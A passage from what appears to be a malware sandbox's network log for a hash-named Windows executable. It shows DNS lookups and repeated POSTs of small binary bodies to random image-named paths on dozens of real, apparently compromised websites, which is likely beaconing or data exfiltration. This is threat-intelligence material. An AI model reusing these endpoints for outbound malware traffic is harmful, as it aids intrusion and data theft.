Set-Cookie: PHPSESSID=e330ff4cef0881e2fc07bc2363bf4c8b; path=/
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Strict-Transport-Security: max-age=15724800; includeSubDomains
DNS

12.242.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

12.242.95.208.in-addr.arpa

IN PTR

Response

12.242.95.208.in-addr.arpa

IN PTR

naneoveranet
DNS

12.242.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

12.242.95.208.in-addr.arpa

IN PTR
DNS

sportsmassoren.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

sportsmassoren.com

IN A

Response

sportsmassoren.com

IN A

94.231.106.24
POST

https://sportsmassoren.com/content/pics/zixrzirane.gif

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

94.231.106.24:443

Request

POST /content/pics/zixrzirane.gif HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: sportsmassoren.com

Response

HTTP/1.1 301 Moved Permanently

Connection: close
content-type: text/html
content-length: 707
date: Tue, 02 Apr 2024 13:56:14 GMT
server: LiteSpeed
location: https://olejuulsmuskelterapi.dk/content/pics/zixrzirane.gif
x-nf-server: Yes
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
DNS

olejuulsmuskelterapi.dk

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

olejuulsmuskelterapi.dk

IN A

Response

olejuulsmuskelterapi.dk

IN A

185.21.41.131
DNS

olejuulsmuskelterapi.dk

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

olejuulsmuskelterapi.dk

IN A

Response

olejuulsmuskelterapi.dk

IN A

185.21.41.131
GET

https://olejuulsmuskelterapi.dk/content/pics/zixrzirane.gif

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

185.21.41.131:443

Request

GET /content/pics/zixrzirane.gif HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Host: olejuulsmuskelterapi.dk

Response

HTTP/1.1 404 Not Found

Connection: close
x-litespeed-vary: cookie=np_wc_currency,cookie=np_wc_currency_language,cookie=_icl_current_language, value=nitrodesktop
x-litespeed-tag: uri=0341c57ac0cc2ff4dbebc0795dc4de54
x-litespeed-cache-control: no-cache
content-type: text/html; charset=UTF-8
x-nitro-cache: MISS
x-nitro-disabled-reason: 404
x-nitro-disabled: 1
set-cookie: PHPSESSID=e04af50372d90d009ddf82bc239b92eb; path=/; secure; HttpOnly
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
link: <https://olejuulsmuskelterapi.dk/wp-json/>; rel="https://api.w.org/"
transfer-encoding: chunked
date: Tue, 02 Apr 2024 13:56:16 GMT
server: LiteSpeed
x-nf-server: Yes
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
DNS

24.106.231.94.in-addr.arpa

Remote address:

8.8.8.8:53

Request

24.106.231.94.in-addr.arpa

IN PTR

Response

24.106.231.94.in-addr.arpa

IN PTR

linux202curanetdk
DNS

24.106.231.94.in-addr.arpa

Remote address:

8.8.8.8:53

Request

24.106.231.94.in-addr.arpa

IN PTR

Response

24.106.231.94.in-addr.arpa

IN PTR

linux202curanetdk
DNS

131.41.21.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.41.21.185.in-addr.arpa

IN PTR

Response

131.41.21.185.in-addr.arpa

IN PTR

linux23curanetdk
DNS

131.41.21.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.41.21.185.in-addr.arpa

IN PTR

Response

131.41.21.185.in-addr.arpa

IN PTR

linux23curanetdk
DNS

vyhino-zhulebino-24.ru

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

vyhino-zhulebino-24.ru

IN A

Response
DNS

torgbodenbollnas.se

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

torgbodenbollnas.se

IN A

Response

torgbodenbollnas.se

IN A

46.30.211.38
DNS

torgbodenbollnas.se

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

torgbodenbollnas.se

IN A

Response

torgbodenbollnas.se

IN A

46.30.211.38
DNS

ora-it.de

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

ora-it.de

IN A

Response

ora-it.de

IN A

176.28.10.103
POST

https://ora-it.de/include/pictures/jszmzy.png

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

176.28.10.103:443

Request

POST /include/pictures/jszmzy.png HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: ora-it.de

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Tue, 02 Apr 2024 13:56:18 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.ora-it.de/include/pictures/jszmzy.png
DNS

www.ora-it.de

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

www.ora-it.de

IN A

Response

www.ora-it.de

IN CNAME

ora-it.de

ora-it.de

IN A

176.28.10.103
DNS

www.ora-it.de

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

www.ora-it.de

IN A

Response

www.ora-it.de

IN CNAME

ora-it.de

ora-it.de

IN A

176.28.10.103
DNS

38.211.30.46.in-addr.arpa

Remote address:

8.8.8.8:53

Request

38.211.30.46.in-addr.arpa

IN PTR

Response

38.211.30.46.in-addr.arpa

IN PTR

domain-parkingonecom
DNS

103.10.28.176.in-addr.arpa

Remote address:

8.8.8.8:53

Request

103.10.28.176.in-addr.arpa

IN PTR

Response

103.10.28.176.in-addr.arpa

IN PTR

server06ora-itde
DNS

103.10.28.176.in-addr.arpa

Remote address:

8.8.8.8:53

Request

103.10.28.176.in-addr.arpa

IN PTR

Response

103.10.28.176.in-addr.arpa

IN PTR

server06ora-itde
GET

https://www.ora-it.de/include/pictures/jszmzy.png

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

176.28.10.103:443

Request

GET /include/pictures/jszmzy.png HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Host: www.ora-it.de

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Tue, 02 Apr 2024 13:56:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/8.0.30
Vary: Accept-Encoding,Cookie
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://www.ora-it.de/wp-json/>; rel="https://api.w.org/"
DNS

digi-talents.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

digi-talents.com

IN A

Response

digi-talents.com

IN A

46.226.40.217
DNS

digi-talents.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

digi-talents.com

IN A

Response

digi-talents.com

IN A

46.226.40.217
POST

https://digi-talents.com/content/temp/ojkfitax.png

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

46.226.40.217:443

Request

POST /content/temp/ojkfitax.png HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: digi-talents.com

Response

HTTP/1.1 404 Not Found

Date: Tue, 02 Apr 2024 12:59:56 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=utcb8b2horubub4dn0fbvjr7t7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <https://digi-talents.com/wp-json/>; rel="https://api.w.org/"
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
DNS

chandlerpd.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

chandlerpd.com

IN A

Response

chandlerpd.com

IN A

216.40.34.41
DNS

chandlerpd.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

chandlerpd.com

IN A

Response

chandlerpd.com

IN A

216.40.34.41
DNS

217.40.226.46.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.40.226.46.in-addr.arpa

IN PTR

Response
DNS

217.40.226.46.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.40.226.46.in-addr.arpa

IN PTR

Response

176.52.247.15:443

https://mank.de/static/images/ueijdxnirivp.gif

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.1kB
5.0kB
11
14

HTTP Request

POST https://mank.de/static/images/ueijdxnirivp.gif

HTTP Response

301
176.52.247.15:443

https://www.mank.de/static/images/ueijdxnirivp.gif

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

1.2kB
19.6kB
14
20

HTTP Request

GET https://www.mank.de/static/images/ueijdxnirivp.gif

HTTP Response

404
217.160.0.10:443

https://work2live.de/uploads/pictures/ta.png

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

1.9kB
4.3kB
8
9

HTTP Request

POST https://work2live.de/uploads/pictures/ta.png
159.69.83.114:443

https://triggi.de/news/image/pmltlc.gif

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

3.1kB
48.4kB
34
40

HTTP Request

POST https://triggi.de/news/image/pmltlc.gif

HTTP Response

404
18.197.248.23:443

https://innote.fi/uploads/image/ht.jpg

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.0kB
4.6kB
10
13

HTTP Request

POST https://innote.fi/uploads/image/ht.jpg

HTTP Response

403
82.212.215.131:443

https://iwelt.de/news/assets/ksry.jpg

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.1kB
5.4kB
11
11

HTTP Request

POST https://iwelt.de/news/assets/ksry.jpg

HTTP Response

301
82.212.215.131:443

https://www.iwelt.de/news/assets/ksry.jpg

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

1.0kB
5.3kB
10
10

HTTP Request

GET https://www.iwelt.de/news/assets/ksry.jpg

HTTP Response

200
74.220.199.6:443

mdacares.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

260 B
200 B
5
5
141.193.213.10:443

https://celularity.com/uploads/graphic/xqkkog.jpg

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.1kB
6.7kB
11
12

HTTP Request

POST https://celularity.com/uploads/graphic/xqkkog.jpg

HTTP Response

404
185.38.248.97:443

https://wychowanieprzedszkolne.pl/data/images/utbnsp.gif

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.2kB
5.0kB
12
12

HTTP Request

POST https://wychowanieprzedszkolne.pl/data/images/utbnsp.gif

HTTP Response

404
5.35.226.24:443

https://bildungsunderlebnis.haus/include/tmp/rguxep.gif

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.0kB
6.3kB
10
12

HTTP Request

POST https://bildungsunderlebnis.haus/include/tmp/rguxep.gif

HTTP Response

404
81.181.102.24:443

urmasiimariiuniri.ro

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

260 B
5
3.33.130.190:443

https://devlaur.com/data/pics/or.gif

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.2kB
4.9kB
13
16

HTTP Request

POST https://devlaur.com/data/pics/or.gif

HTTP Response

405
212.83.139.44:443

https://philippedebroca.com/admin/image/ppwfmo.jpg

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.1kB
5.9kB
12
15

HTTP Request

POST https://philippedebroca.com/admin/image/ppwfmo.jpg

HTTP Response

301
212.83.139.44:443

https://www.philippedebroca.fr/admin/image/ppwfmo.jpg

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.9kB
86.8kB
51
67

HTTP Request

GET https://www.philippedebroca.fr/admin/image/ppwfmo.jpg

HTTP Response

404
51.75.34.224:443

https://kaminscy.com/uploads/images/xvrcakvaetjk.gif

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.1kB
9.3kB
12
17

HTTP Request

POST https://kaminscy.com/uploads/images/xvrcakvaetjk.gif

HTTP Response

301
51.75.34.224:443

https://www.kaminscy.com/uploads/images/xvrcakvaetjk.gif

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

1.1kB
6.0kB
11
14

HTTP Request

GET https://www.kaminscy.com/uploads/images/xvrcakvaetjk.gif

HTTP Response

404
91.239.233.22:443

https://webcodingstudio.com/uploads/tmp/zplemxvx.png

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.6kB
42.4kB
23
36

HTTP Request

POST https://webcodingstudio.com/uploads/tmp/zplemxvx.png

HTTP Response

404
208.100.26.245:443

https://onlybacklink.com/news/tmp/wcytkdtb.png

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.1kB
5.9kB
11
12

HTTP Request

POST https://onlybacklink.com/news/tmp/wcytkdtb.png

HTTP Response

404
35.177.75.40:443

https://victoriousfestival.co.uk/include/graphic/wcfo.gif

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.1kB
4.3kB
10
13

HTTP Request

POST https://victoriousfestival.co.uk/include/graphic/wcfo.gif

HTTP Response

301
35.177.75.40:443

https://www.victoriousfestival.co.uk/include/graphic/wcfo.gif

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

3.2kB
96.3kB
58
73

HTTP Request

GET https://www.victoriousfestival.co.uk/include/graphic/wcfo.gif

HTTP Response

404
188.114.96.2:443

https://levdittliv.se/content/tmp/twxa.jpg

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.1kB
6.2kB
12
12

HTTP Request

POST https://levdittliv.se/content/tmp/twxa.jpg

HTTP Response

301
172.67.75.185:443

https://fitforme.com/sv-se/vara-multivitaminer/

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

3.5kB
139.6kB
63
119

HTTP Request

GET https://fitforme.com/sv-se/vara-multivitaminer/

HTTP Response

200
35.215.118.92:443

https://rosavalamedahr.com/static/tmp/dwms.png

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

3.4kB
56.5kB
39
45

HTTP Request

POST https://rosavalamedahr.com/static/tmp/dwms.png

HTTP Response

404
70.40.220.182:443

https://dupontsellshomes.com/data/pictures/agzfktulhq.jpg

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.1kB
6.3kB
12
12

HTTP Request

POST https://dupontsellshomes.com/data/pictures/agzfktulhq.jpg

HTTP Response

404
104.21.95.31:443

https://braffinjurylawfirm.com/uploads/pics/ulgz.png

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.1kB
6.7kB
12
12

HTTP Request

POST https://braffinjurylawfirm.com/uploads/pics/ulgz.png

HTTP Response

302
104.21.95.31:443

https://braffinjurylawfirm.com/

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.5kB
70.5kB
39
68

HTTP Request

GET https://braffinjurylawfirm.com/

HTTP Response

200
35.190.31.54:443

https://xtptrack.com/data/pictures/pugigjqlcx.jpg

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.1kB
4.3kB
10
12

HTTP Request

POST https://xtptrack.com/data/pictures/pugigjqlcx.jpg

HTTP Response

301
34.120.190.48:443

https://www.xtptrack.com/data/pictures/pugigjqlcx.jpg

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

1.1kB
9.7kB
10
13

HTTP Request

GET https://www.xtptrack.com/data/pictures/pugigjqlcx.jpg

HTTP Response

404
213.186.33.4:443

https://alsace-first.com/content/images/tgwk.gif

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.9kB
39.6kB
30
34

HTTP Request

POST https://alsace-first.com/content/images/tgwk.gif

HTTP Response

404
208.95.242.12:443

https://woodleyacademy.org/uploads/temp/kzkszsprcr.gif

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.2kB
9.3kB
13
17

HTTP Request

POST https://woodleyacademy.org/uploads/temp/kzkszsprcr.gif

HTTP Response

404
94.231.106.24:443

https://sportsmassoren.com/content/pics/zixrzirane.gif

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.1kB
5.5kB
10
12

HTTP Request

POST https://sportsmassoren.com/content/pics/zixrzirane.gif

HTTP Response

301
185.21.41.131:443

https://olejuulsmuskelterapi.dk/content/pics/zixrzirane.gif

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

1.9kB
40.4kB
29
33

HTTP Request

GET https://olejuulsmuskelterapi.dk/content/pics/zixrzirane.gif

HTTP Response

404
46.30.211.38:443

torgbodenbollnas.se

tls

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

641 B
5.5kB
8
9
176.28.10.103:443

https://ora-it.de/include/pictures/jszmzy.png

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.1kB
4.1kB
11
11

HTTP Request

POST https://ora-it.de/include/pictures/jszmzy.png

HTTP Response

301
176.28.10.103:443

https://www.ora-it.de/include/pictures/jszmzy.png

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.3kB
59.4kB
39
47

HTTP Request

GET https://www.ora-it.de/include/pictures/jszmzy.png

HTTP Response

404
46.226.40.217:443

https://digi-talents.com/content/temp/ojkfitax.png

tls, http

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

2.7kB
30.4kB
23
27

HTTP Request

POST https://digi-talents.com/content/temp/ojkfitax.png

HTTP Response

404
216.40.34.41:443

chandlerpd.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

208 B
4

8.8.8.8:53

183.142.211.20.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

183.142.211.20.in-addr.arpa
8.8.8.8:53

218.135.221.88.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

218.135.221.88.in-addr.arpa
8.8.8.8:53

5.181.190.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

5.181.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

196.249.167.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

196.249.167.52.in-addr.arpa
8.8.8.8:53

104.219.191.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

104.219.191.52.in-addr.arpa
8.8.8.8:53

81.171.91.138.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

81.171.91.138.in-addr.arpa
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

35.34.16.2.in-addr.arpa

dns

69 B
131 B
1
1

DNS Request

35.34.16.2.in-addr.arpa
8.8.8.8:53

mank.de

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

53 B
69 B
1
1

DNS Request

mank.de

DNS Response

176.52.247.15
8.8.8.8:53

www.mank.de

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

57 B
87 B
1
1

DNS Request

www.mank.de

DNS Response

176.52.247.15
8.8.8.8:53

15.247.52.176.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.247.52.176.in-addr.arpa
8.8.8.8:53

work2live.de

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

58 B
74 B
1
1

DNS Request

work2live.de

DNS Response

217.160.0.10
8.8.8.8:53

10.0.160.217.in-addr.arpa

dns

71 B
118 B
1
1

DNS Request

10.0.160.217.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

triggi.de

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

55 B
71 B
1
1

DNS Request

triggi.de

DNS Response

159.69.83.114
8.8.8.8:53

innote.fi

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

55 B
87 B
1
1

DNS Request

innote.fi

DNS Response

18.197.248.23

52.59.120.70
8.8.8.8:53

iwelt.de

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

54 B
70 B
1
1

DNS Request

iwelt.de

DNS Response

82.212.215.131
8.8.8.8:53

www.iwelt.de

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

58 B
74 B
1
1

DNS Request

www.iwelt.de

DNS Response

82.212.215.131
8.8.8.8:53

114.83.69.159.in-addr.arpa

dns

72 B
106 B
1
1

DNS Request

114.83.69.159.in-addr.arpa
8.8.8.8:53

23.248.197.18.in-addr.arpa

dns

72 B
117 B
1
1

DNS Request

23.248.197.18.in-addr.arpa
8.8.8.8:53

131.215.212.82.in-addr.arpa

dns

73 B
105 B
1
1

DNS Request

131.215.212.82.in-addr.arpa
8.8.8.8:53

mdacares.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

58 B
74 B
1
1

DNS Request

mdacares.com

DNS Response

74.220.199.6
8.8.8.8:53

celularity.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

60 B
92 B
1
1

DNS Request

celularity.com

DNS Response

141.193.213.10

141.193.213.11
8.8.8.8:53

wychowanieprzedszkolne.pl

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

71 B
87 B
1
1

DNS Request

wychowanieprzedszkolne.pl

DNS Response

185.38.248.97
8.8.8.8:53

bildungsunderlebnis.haus

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

70 B
86 B
1
1

DNS Request

bildungsunderlebnis.haus

DNS Response

5.35.226.24
8.8.8.8:53

10.213.193.141.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

10.213.193.141.in-addr.arpa
8.8.8.8:53

urmasiimariiuniri.ro

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

132 B
164 B
2
2

DNS Request

urmasiimariiuniri.ro

DNS Request

urmasiimariiuniri.ro

DNS Response

81.181.102.24

DNS Response

81.181.102.24
8.8.8.8:53

97.248.38.185.in-addr.arpa

dns

144 B
216 B
2
2

DNS Request

97.248.38.185.in-addr.arpa

DNS Request

97.248.38.185.in-addr.arpa
8.8.8.8:53

23.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

23.236.111.52.in-addr.arpa
8.8.8.8:53

24.226.35.5.in-addr.arpa

dns

70 B
111 B
1
1

DNS Request

24.226.35.5.in-addr.arpa
8.8.8.8:53

devlaur.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

57 B
89 B
1
1

DNS Request

devlaur.com

DNS Response

3.33.130.190

15.197.148.33
8.8.8.8:53

philippedebroca.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

65 B
81 B
1
1

DNS Request

philippedebroca.com

DNS Response

212.83.139.44
8.8.8.8:53

190.130.33.3.in-addr.arpa

dns

71 B
127 B
1
1

DNS Request

190.130.33.3.in-addr.arpa
8.8.8.8:53

www.philippedebroca.fr

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

68 B
98 B
1
1

DNS Request

www.philippedebroca.fr

DNS Response

212.83.139.44
8.8.8.8:53

44.139.83.212.in-addr.arpa

dns

72 B
119 B
1
1

DNS Request

44.139.83.212.in-addr.arpa
8.8.8.8:53

kaminscy.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

58 B
74 B
1
1

DNS Request

kaminscy.com

DNS Response

51.75.34.224
8.8.8.8:53

www.kaminscy.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

124 B
184 B
2
2

DNS Request

www.kaminscy.com

DNS Request

www.kaminscy.com

DNS Response

51.75.34.224

DNS Response

51.75.34.224
8.8.8.8:53

224.34.75.51.in-addr.arpa

dns

71 B
94 B
1
1

DNS Request

224.34.75.51.in-addr.arpa
8.8.8.8:53

boompinoy.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

59 B
132 B
1
1

DNS Request

boompinoy.com
8.8.8.8:53

webcodingstudio.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

130 B
162 B
2
2

DNS Request

webcodingstudio.com

DNS Request

webcodingstudio.com

DNS Response

91.239.233.22

DNS Response

91.239.233.22
8.8.8.8:53

22.233.239.91.in-addr.arpa

dns

72 B
105 B
1
1

DNS Request

22.233.239.91.in-addr.arpa
8.8.8.8:53

onlybacklink.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

124 B
156 B
2
2

DNS Request

onlybacklink.com

DNS Request

onlybacklink.com

DNS Response

208.100.26.245

DNS Response

208.100.26.245
8.8.8.8:53

victoriousfestival.co.uk

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

70 B
86 B
1
1

DNS Request

victoriousfestival.co.uk

DNS Response

35.177.75.40
8.8.8.8:53

www.victoriousfestival.co.uk

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

74 B
90 B
1
1

DNS Request

www.victoriousfestival.co.uk

DNS Response

35.177.75.40
8.8.8.8:53

40.75.177.35.in-addr.arpa

dns

142 B
266 B
2
2

DNS Request

40.75.177.35.in-addr.arpa

DNS Request

40.75.177.35.in-addr.arpa
8.8.8.8:53

245.26.100.208.in-addr.arpa

dns

73 B
127 B
1
1

DNS Request

245.26.100.208.in-addr.arpa
8.8.8.8:53

levdittliv.se

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

59 B
91 B
1
1

DNS Request

levdittliv.se

DNS Response

188.114.96.2

188.114.97.2
8.8.8.8:53

fitforme.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

58 B
106 B
1
1

DNS Request

fitforme.com

DNS Response

172.67.75.185

104.26.9.199

104.26.8.199
8.8.8.8:53

2.96.114.188.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

2.96.114.188.in-addr.arpa
8.8.8.8:53

rosavalamedahr.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

64 B
80 B
1
1

DNS Request

rosavalamedahr.com

DNS Response

35.215.118.92
8.8.8.8:53

185.75.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

185.75.67.172.in-addr.arpa
8.8.8.8:53

92.118.215.35.in-addr.arpa

dns

72 B
124 B
1
1

DNS Request

92.118.215.35.in-addr.arpa
8.8.8.8:53

dupontsellshomes.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

66 B
82 B
1
1

DNS Request

dupontsellshomes.com

DNS Response

70.40.220.182
8.8.8.8:53

braffinjurylawfirm.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

68 B
100 B
1
1

DNS Request

braffinjurylawfirm.com

DNS Response

104.21.95.31

172.67.142.162
